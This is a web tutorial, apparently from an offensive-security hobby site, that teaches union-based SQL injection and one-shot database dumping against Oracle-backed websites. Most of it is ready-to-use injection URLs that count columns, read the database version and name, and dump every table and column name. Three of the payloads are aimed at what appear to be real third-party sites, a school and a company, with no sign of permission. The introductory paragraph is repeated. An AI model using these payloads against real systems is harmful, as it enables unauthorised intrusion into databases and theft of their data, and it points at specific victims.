In the Name of ALLAH the Most Beneficent and the Merciful
After getting a lot of request on adding other DIOS and other database ralated Injection tutorials on Securityidiots. Here we are up with Oracle Based SQL Injection and DIOS tutorial
Here is the basics of Oracle Union Based Injection which you can use to inject oracle based sites Union Based Oracle Injection
I hope reading the above Union Based Oracle Injection now you know how to inject a oracle based site, now we ll inject "http://demosite.com/page.php?id=1" in our tutorial. Lets see if the below input gives us an error. Before we start watch this basic video which contains how to use some of the queries below, then you can read the tutorial which gives more explained and some other examples of oracle DIOS and injection.
    
        After getting a lot of request on adding other DIOS and other database ralated Injection tutorials on Securityidiots. Here we are up with Oracle Based SQL Injection and DIOS tutorial
Here is the basics of Oracle Union Based Injection which you can use to inject oracle based sites Union Based Oracle Injection
I hope reading the above Union Based Oracle Injection now you know how to inject a oracle based site, now we ll inject "http://demosite.com/page.php?id=1" in our tutorial. Lets see if the below input gives us an error. Before we start watch this basic video which contains how to use some of the queries below, then you can read the tutorial which gives more explained and some other examples of oracle DIOS and injection.
http://demosite.com/page.php?id=1'
http://demosite.com/page.php?id=1' order by 1--
No Error
http://demosite.com/page.php?id=1' order by 8--
No Error
http://demosite.com/page.php?id=1' order by 9--
Error
http://demosite.com/page.php?id=1'and 0=1 union select 111,222,333,444,555,666,777,888--
If you get some error then try
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
and find the vulnerable column manually, but suppose that too dont work then try this.
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
Hopefully mixing one of the above tricks may work.
To get the version we use (select banner from v$version where rownum=1)
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,(select banner from v$version where rownum=1),NULL,NULL,NULL,NULL,NULL--
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL,NULL--
http://demosite.com/page.php?id=1'and 0=1 union select NULL,NULL,(SELECT replace(wm_concat('<li>'||table_name),',','') FROM all_tables),NULL,NULL,NULL,NULL,NULL--
http://www.technoriunite.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
http://www.beaconhouse.edu.pk/cms_main_career.php?id=9&subpg=1&pjobid=-22050 and 0=1 UNION+SELECT NULL,(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns  order by table_name desc) shell where rnum<120)||'<!--',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
http://www.technoriunite.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns  order by table_name desc) shell where rnum<120)||'<!--' ,NULL,NULL from dual --&lang=it
 
             
                